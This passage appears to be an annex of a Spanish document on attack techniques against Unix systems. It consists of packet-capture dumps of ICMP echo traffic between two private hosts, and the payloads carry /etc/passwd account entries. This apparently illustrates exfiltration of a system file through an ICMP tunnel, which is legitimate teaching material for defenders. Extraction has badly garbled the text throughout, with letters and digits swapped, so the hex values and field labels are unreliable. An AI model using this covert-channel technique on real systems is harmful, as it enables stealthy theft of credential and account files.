Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+- de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7656+)5+616,+C303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 17 9+ 0( 63 3a (6 61 3a 6e 65 3a 31 b) 0) 6b 30 3a 6! (a 65 7( 96 ba 00 6+ 3a (f (f 3a (7 3a 5b 00 17 6f 3a 7( 6( 30 61 (f 1f 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 0! 01 1( 76 30 7+ (f 3a 69 6f (9 +0 01 56 3a 3a 6( 3a 6e 7+ e1 3e 00 +) +3 (f 61 30 (0 3a a( !0 63 5+ 6) 75 73 3a 53 0a (6 a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 1e 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..1.-...:..e..<. ......I.I>...... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

Brame + 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D1f(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7656+)5+616,+C303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 0! 9+ 1e 63 3a (6 61 3a 6e 65 3a (9 7+ 00 6b 30 3a 6! (a 65 7( e1 39 00 6+ 3a (f (f 3a (7 3a a( 00 1f 6f 3a 7( 6( 30 61 (f (6 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 17 01 1( 76 30 7+ (f 3a 69 6f 31 )+ 01 56 3a 3a 6( 3a 6e 7+ 96 bf 00 +) +3 (f 61 30 (0 3a 5b !0 63 5+ 6) 75 73 3a 53 0a 1f a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 0( 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..:..e..1.-...<. ..t9..I......... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

Brame 5 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+6+5 -!orre!t0 87entifier: 0D1)1( .equen!e number: 51( 90D0(00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((#3#313#313#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 00 00 00 61 30 73 3a 17 9+ 0( 63 3a 79 (f 31 !1 0) 6b +f 73 7( 96 bf 00 6+ 77 7+ 6f 5b 00 +6 6f 6e 65 6f 1f 00 +5 6f 65 67 7+ 00 +0 1) 7( 7( (0 3a 0! 01 1( (a (0 70 (f (9 37 0( 3a 6f 7( 75 e1 39 00 31 66 6f 73 a( !0 63 3a (0 63 7( (6 a) 6! 31 67 65 (f 0) 00 61 3a 61 73 73 00 1e 76 3a 6e 73 6( +5 !0 65 30 79 65 69 00 a) 6( 3a (0 73 6e ..1.-...:..e..<. ......I.79...... ....B<....!"a@eb a!67oorQ:1:1::0: 0:O>ner of manE E tem pro!e e :;root:;u r; bin

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+1 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
0070 00)0 0090 00a0 (f 7( 7+ 6e 6e 6f 6! 6f 67 69 6e 0a 6f 70 65 7( 61 7+ 6f 3a (a 3a 3( 3a 35 3a 3a 30 3a 30 3a 53 79 73 65 67 (0 (6 3a (f 3a (f 75 73 7( (f 73 6( 69 (f ;no"ogin.operato r:Q:(:5::0:0:.E tem e:;:;u r; bi n;

Brame 6 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D+e+5 -!orre!t0 87entifier: 0D1)1( .equen!e number: 51( 90D0(00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((#3#313#313#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 73 3a (f 7( 7+ 6e 0! 9+ 1e 63 3a 79 (f 6e 3a 65 (f (9 7+ 00 6b +f 73 7( 6f (a 67 e1 3a 00 6+ 77 7+ 6f 6! 3a (0 a( 00 +e 6f 6e 65 6f 6f 3( (6 (6 00 +5 6f 65 67 7+ 67 3a 3a 00 +0 1) 7( 7( (0 3a 69 35 (f 17 01 1( (a (0 70 (f 6e 3a 3a 31 )+ 0( 3a 6f 7( 75 0a 3a (f 96 be 00 31 66 6f 73 6f 30 75 5b !0 63 3a (0 63 7( 70 3a 73 1f a) 6! 31 67 65 (f 65 30 7( 0) 00 61 3a 61 73 73 7( 3a (f 00 0( 76 3a 6e 73 6( 61 53 73 +5 !0 65 30 79 65 69 7+ 79 6( 00 a) 6( 3a (0 73 6e 6f 73 69 ..:..e..1.-...<. ..t:..I......... ....N<....!"a@eb a!67oorQ:1:1::0: 0:O>ner of manE E tem pro!e e :;root:;u r; bin ;no"ogin.operato r:Q:(:5::0:0:.E tem e:;:;u r; bi n;

Brame 7 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0Dfb!) -!orre!t0 87entifier: 0D1)1( .equen!e number: 76) 90D0300: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6<6B6,6B67696<0#6(696<... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 69 6e 61 7( 7+ 30 (f 17 9+ 0( 63 6e 61 6e (f 79 3a 75 31 0f 0) 6b 3a 7( 6+ 73 3a 5+ 96 (7 00 6+ (a 69 (0 6( (a 7+ 5b 00 fb 6f 3a 65 53 69 3a 79 1f 00 !) 6f 33 73 6f 6e 3+ (0 00 +0 1) 7( 3a (0 75 (f 3a 53 0! 01 1( 6e 37 +3 7( 6e 36 61 (9 e9 03 6f 3a 6f 63 6f 35 6e e1 71 00 6! 3a 67 65 6! 35 6+ a( !0 63 6f 30 67 3a 6f 33 6( (6 a) 6! 67 3a 61 (f 67 33 6f 0) 00 61 69 30 6e 3a 69 3a 7) 00 1e 76 6e 3a 6+ (f 6e 3a 3a +5 !0 65 0a +( 73 75 0a 30 (f 00 a) 6( 6( 69 (0 73 7+ 3a 3a ..1.-...:..e..<. ...J..I......... ..........!"a@eb a!67oorno"ogin.b in:Q:3:7::0:0:Ci narie ,omman7 an7 .our!e:;:;u r; bin;no"ogin.t tE:Q:+:65533::0: 0:TtE .an7boD:;: ;u

Brame ) 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D03!9 -!orre!t0 87entifier: 0D1)1( .equen!e number: 76) 90D0300: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6<6B6,6B67696<0#6(696<... 0000 0010 00 0! (9 e1 a( (6 00 17 31 96 5b 1f 0) 00 +5 00 00 9+ 7+ 3b 00 00 +0 01 )+ b7 !0 a) 00 0( !0 a) ..:..e..1.-...<. ..tL..I.........

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+5 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 61 69 6e 61 7( 7+ 30 (f 1e 63 6e 61 6e (f 79 3a 75 00 6b 3a 7( 6+ 73 3a 5+ 00 6+ (a 69 (0 6( (a 7+ 03 6f 3a 65 53 69 3a 79 !9 6f 33 73 6f 6e 3+ (0 1) 7( 3a (0 75 (f 3a 53 1( 6e 37 +3 7( 6e 36 61 03 6f 3a 6f 63 6f 35 6e 00 6! 3a 67 65 6! 35 6+ 63 6f 30 67 3a 6f 33 6( 6! 67 3a 61 (f 67 33 6f 61 69 30 6e 3a 69 3a 7) 76 6e 3a 6+ (f 6e 3a 3a 65 0a +( 73 75 0a 30 (f 6( 6( 69 (0 73 7+ 3a 3a ..........!"a@eb a!67oorno"ogin.b in:Q:3:7::0:0:Ci narie ,omman7 an7 .our!e:;:;u r; bin;no"ogin.t tE:Q:+:65533::0: 0:TtE .an7boD:;: ;u

Brame 9 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0Db6e) -!orre!t0 87entifier: 0D1)1( .equen!e number: 10(+ 90D0+00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B736(696<(B6<6B6,... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6f 36 53 6( 73 67 (f 17 9+ 0( 63 6! 35 61 69 3a 65 75 31 09 0) 6b 6f 35 6e 6e (a 73 96 1f 00 6+ 67 33 6+ (f 3a (0 5b 00 b6 6f 69 33 6( 6e 37 70 1f 00 e) 6f 6e 3a 6f 6f 3a 73 00 +0 1) 7( 0a 3a 7) 6! 31 65 0! 01 1( 73 6b 30 3a 6f 33 75 (9 ef 0+ 7( 67 3a (f 67 3a 6+ e1 79 00 (f 65 30 3a 69 3a 6f a( !0 63 73 67 3a (f 6e 30 (7 (6 a) 6! 6( 3a +b 75 0a 3a 75 0) 00 61 69 (a +7 73 67 30 73 00 1e 76 6e 3a 65 7( 61 3a 65 +5 !0 65 (f 35 67 (f 67 +7 7( 00 a) 6( 6e 3a (0 73 65 61 3a ..1.-...:..e..<. ......I......... ..........!"a@eb a!67oor r; bin;n o"ogin.6mem:Q:5: 65533::0:0:53em .an7boD:;:;u r; bin;no"ogin.game :Q:7:13::0:0:Ha me p eu7o-u er: ;u

Brame 10 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0Dbee) -!orre!t0 87entifier: 0D1)1( .equen!e number: 10(+ 90D0+00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B736(696<(B6<6B6,... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6f 36 53 6( 73 67 (f 0! 9+ 1e 63 6! 35 61 69 3a 65 75 (9 7+ 00 6b 6f 35 6e 6e (a 73 e1 3! 00 6+ 67 33 6+ (f 3a (0 a( 00 be 6f 69 33 6( 6e 37 70 (6 00 e) 6f 6e 3a 6f 6f 3a 73 00 +0 1) 7( 0a 3a 7) 6! 31 65 17 01 1( 73 6b 30 3a 6f 33 75 31 )+ 0+ 7( 67 3a (f 67 3a 6+ 96 b! 00 (f 65 30 3a 69 3a 6f 5b !0 63 73 67 3a (f 6e 30 (7 1f a) 6! 6( 3a +b 75 0a 3a 75 0) 00 61 69 (a +7 73 67 30 73 00 0( 76 6e 3a 65 7( 61 3a 65 +5 !0 65 (f 35 67 (f 67 +7 7( 00 a) 6( 6e 3a (0 73 65 61 3a ..:..e..1.-...<. ..tT..I......... ..........!"a@eb a!67oor r; bin;n o"ogin.6mem:Q:5: 65533::0:0:53em .an7boD:;:;u r; bin;no"ogin.game :Q:7:13::0:0:Ha me p eu7o-u er: ;u

Brame 11 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D)e0e -!orre!t0 87entifier: 0D1)1( .equen!e number: 1()0 90D0500:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+J de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B67616D65733#(B75... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 6e 30 3a 6f 30 61 17 9+ 0( 63 75 0a 3a (f 67 3a 67 31 09 0) 6b 73 6e +e 3a 69 30 96 67 00 6+ 7( 65 65 (f 6e 3a 5b 00 )e 6f (f 77 77 75 0a +7 1f 00 0e 6f 73 73 73 73 67 69 00 +0 1) 7( 6( 3a (0 7( 61 73 0! 01 1( 73 69 (a 53 (f 6e 7+ (9 ef 05 7( 6e 3a 75 73 3a 65 e1 )b 00 (f (f 3) 6( 6( (a 7( a( !0 63 67 6e 3a 73 69 3a (0 (6 a) 6! 61 6f 3) 79 6e 39 +7 0) 00 61 67 6! 3a 73 (f 3a 61 00 1e 76 65 6f 3a 7+ 6e 39 6e +5 !0 65 73 67 30 65 6f 3a (0 00 a) 6( 3a 69 3a 67 6! 3a 50 ..1.-...:..e..<. ...m..I......... ..........!"a@eb a!67oor r;game : ;u r; bin;no"ogi n.ne> :Q:):)::0: 0:Ne> .ub E tem :;:;u r; bin;no" ogin.man:Q:9:9:: 0:0:3i ter 3an P ag

Brame 1( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D960e -!orre!t0 87entifier: 0D1)1( .equen!e number: 1()0 90D0500: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B67616D65733#(B75... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 6e 30 3a 6f 30 61 0! 9+ 1e 63 75 0a 3a (f 67 3a 67 (9 7+ 00 6b 73 6e +e 3a 69 30 e1 37 00 6+ 7( 65 65 (f 6e 3a a( 00 96 6f (f 77 77 75 0a +7 (6 00 0e 6f 73 73 73 73 67 69 00 +0 1) 7( 6( 3a (0 7( 61 73 17 01 1( 73 69 (a 53 (f 6e 7+ 31 )+ 05 7( 6e 3a 75 73 3a 65 96 bb 00 (f (f 3) 6( 6( (a 7( 5b !0 63 67 6e 3a 73 69 3a (0 1f a) 6! 61 6f 3) 79 6e 39 +7 0) 00 61 67 6! 3a 73 (f 3a 61 00 0( 76 65 6f 3a 7+ 6e 39 6e +5 !0 65 73 67 30 65 6f 3a (0 00 a) 6( 3a 69 3a 67 6! 3a 50 ..:..e..1.-...<. ..t1..I......... ..........!"a@eb a!67oor r;game : ;u r; bin;no"ogi n.ne> :Q:):)::0: 0:Ne> .ub E tem :;:;u r; bin;no" ogin.man:Q:9:9:: 0:0:3i ter 3an P ag

Brame 13 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D5bb( -!orre!t0 87entifier: 0D1)1( .equen!e number: 1536 90D0600: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65733#(B75737((B736)61... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6) 69 (a 75 3a (f 67 17 9+ 0( 63 61 6e 3a 7( (f 73 73 31 01 0) 6b 7( (f 3( 65 76 6( 96 !a 00 6+ 65 6e 3( (0 61 69 5b 00 5b 6f (f 6f 3a 53 7( 6e 1f 00 b( 6f 67 6! 3( 6) (f (f 00 +0 1) 7( 61 6f 3( 65 65 6e 0! 01 1( 65 6e 67 3a 6! 67 6f (9 f7 06 73 3a 69 3a 6! 70 6! e1 (e 00 3a (f 6e 30 (0 7+ 6f a( !0 63 (f 75 0a 3a ++ 79 67 (6 a) 6! 75 73 73 30 61 3a 69 0) 00 61 73 7( 73 3a 65 (f 6e 00 1e 76 7( (f 6) 53 67 75 0a +5 !0 65 (f 73 6+ 65 6f 73 73 00 a) 6( 73 6( 3a 63 6e 7( 67 ..1.-...:..e..<. ......I......... ....-.....!"a@eb a!67oore :;u r; 'are;man:;u r; b in;no"ogin. '7: Q:((:((::0:0:.e! ure .'e"" Daemon :;@ar;emptE:;u r ; bin;no"ogin. m m

Brame 1+ 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o"

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *++ de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D63b( -!orre!t0 87entifier: 0D1)1( .equen!e number: 1536 90D0600: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65733#(B75737((B736)61... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6) 69 (a 75 3a (f 67 0! 9+ 1e 63 61 6e 3a 7( (f 73 73 (9 7+ 00 6b 7( (f 3( 65 76 6( e1 3e 00 6+ 65 6e 3( (0 61 69 a( 00 63 6f (f 6f 3a 53 7( 6e (6 00 b( 6f 67 6! 3( 6) (f (f 00 +0 1) 7( 61 6f 3( 65 65 6e 17 01 1( 65 6e 67 3a 6! 67 6f 31 )+ 06 73 3a 69 3a 6! 70 6! 96 ba 00 3a (f 6e 30 (0 7+ 6f 5b !0 63 (f 75 0a 3a ++ 79 67 1f a) 6! 75 73 73 30 61 3a 69 0) 00 61 73 7( 73 3a 65 (f 6e 00 0( 76 7( (f 6) 53 67 75 0a +5 !0 65 (f 73 6+ 65 6f 73 73 00 a) 6( 73 6( 3a 63 6e 7( 67 ..:..e..1.-...<. ..t>..I......... ....!.....!"a@eb a!67oore :;u r; 'are;man:;u r; b in;no"ogin. '7: Q:((:((::0:0:.e! ure .'e"" Daemon :;@ar;emptE:;u r ; bin;no"ogin. m m

Brame 15 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D7156 -!orre!t0 87entifier: 0D1)1( .equen!e number: 179( 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(703#(#3#3(353#3(353#3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 75 76 67 (f 6! 65 17 9+ 0( 63 3a 6( 61 71 6e 3a 6e 31 )9 0) 6b 30 67 7( 75 6f (a 96 (0 00 6+ 3a 69 (f 65 6! 3a 5b 00 71 6f 30 73 73 75 6f 3( 1f 00 56 6f 3a 73 70 65 67 36 00 +0 1) 7( 53 69 6f 3a 69 3a 0! 01 1( 70 65 6f 6f (f 6e 3( (9 6f 07 3a 6e 6e 6! 75 0a 36 e1 7) 00 (a 6+ (0 (f 73 67 3a a( !0 63 3a 67 55 63 7( 61 3a (6 a) 6! 3( 61 73 6! (f 69 30 0) 00 61 35 69 65 69 73 6! 3a 00 1e 76 3a 6! 7( 65 6( 6e 30 +5 !0 65 3( (0 3a 6e 69 75 3a 00 a) 6( 35 53 (f 7+ 6e 6! 53 ..1.-...:..e..<. ... ..I.o....... .....=....!"a@eb a!67oorp:Q:(5:(5 ::0:0:.en7mai" . ubmi ion K er:; @ar; poo";!"ient mqueue:;u r; bin ;no"ogin.mai"nu" ":Q:(6:(6::0:0:. en

Brame 16 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D7956 -!orre!t0 87entifier: 0D1)1( .equen!e number: 179( 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(703#(#3#3(353#3(353#3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 75 76 67 (f 6! 65 0! 9+ 1e 63 3a 6( 61 71 6e 3a 6e (9 7+ 00 6b 30 67 7( 75 6f (a e1 3f 00 6+ 3a 69 (f 65 6! 3a a( 00 79 6f 30 73 73 75 6f 3( (6 00 56 6f 3a 73 70 65 67 36 00 +0 1) 7( 53 69 6f 3a 69 3a 17 01 1( 70 65 6f 6f (f 6e 3( 31 )+ 07 3a 6e 6e 6! 75 0a 36 96 b9 00 (a 6+ (0 (f 73 67 3a 5b !0 63 3a 67 55 63 7( 61 3a 1f a) 6! 3( 61 73 6! (f 69 30 0) 00 61 35 69 65 69 73 6! 3a 00 0( 76 3a 6! 7( 65 6( 6e 30 +5 !0 65 3( (0 3a 6e 69 75 3a 00 a) 6( 35 53 (f 7+ 6e 6! 53 ..:..e..1.-...<. ..t*..I......... .....=....!"a@eb a!67oorp:Q:(5:(5 ::0:0:.en7mai" . ubmi ion K er:; @ar; poo";!"ient mqueue:;u r; bin ;no"ogin.mai"nu" ":Q:(6:(6::0:0:. en

Brame 17 916( bEte

on >ire4 16( bEte

!apture7:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+O de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
<t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D65ff -!orre!t0 87entifier: 0D1)1( .equen!e number: (0+) 90D0)00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6+6D61696,(0++65666175... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 61 70 (f 6e +( 75 0a 17 9+ 0( 63 75 6f 73 6+ 69 73 70 31 9! 0) 6b 6! 6f 6( 3a 6e 7( 96 93 00 6+ 7+ 6! 69 (a 6+ (f 5b 00 65 6f (0 (f 6e 3a (0 73 1f 00 ff 6f 55 67 (f 35 53 6( 00 +0 1) 7( 73 71 6e 33 61 69 0! 01 1( 6+ 65 75 6f 3a 6e 6e (9 5! 0) 67 7( 65 6! 35 6+ (f e1 65 00 61 3a 75 6f 33 6( 6e a( !0 63 69 (f 65 67 3a 6f 6f (6 a) 6! 6! 76 3a 69 3a 7) 6! 0) 00 61 (0 61 (f 6e 30 3a 6f 00 1e 76 ++ 7( 75 0a 3a (f 67 +5 !0 65 65 (f 73 6( 30 3a 69 00 a) 6( 66 73 7( 69 3a (f 6e ..1.-...:..e..<. ......I.[e...... ....e.....!"a@eb a!67oor7mai" Def au"t K er:;@ar; poo";mqueue:;u r ; bin;no"ogin.bi n7:Q:53:53::0:0: Cin7 .an7boD:;:; u r; bin;no"ogin .p

